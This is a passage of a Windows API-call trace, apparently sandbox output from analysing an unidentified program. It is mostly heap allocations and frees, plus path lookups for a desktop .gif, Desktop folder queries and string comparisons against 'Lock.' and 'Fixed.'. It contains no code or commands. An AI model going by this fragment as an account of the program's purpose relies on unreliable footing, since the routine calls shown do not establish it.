(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416f30 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0166.143] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/jrgF.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif", lpFilePart=0x8bf658*="jrgF.gif") returned 0x2e [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0166.143] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrgf.gif")) returned 0xffffffff [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.143] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0166.143] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.143] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KU9xovkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9xovkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9xovkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xovkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vkL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kL1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lisorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sorTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rTK5X", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0166.145] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f170 [0166.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KU9xovkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9xovkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9xovkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xovkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vkL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kL1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lisorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sorTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orTK5X", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36f8 [0166.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0166.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0166.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.147] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0166.148] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0166.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0166.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0166.148] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0166.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.149] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0166.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0166.151] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0166.151] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0166.152] 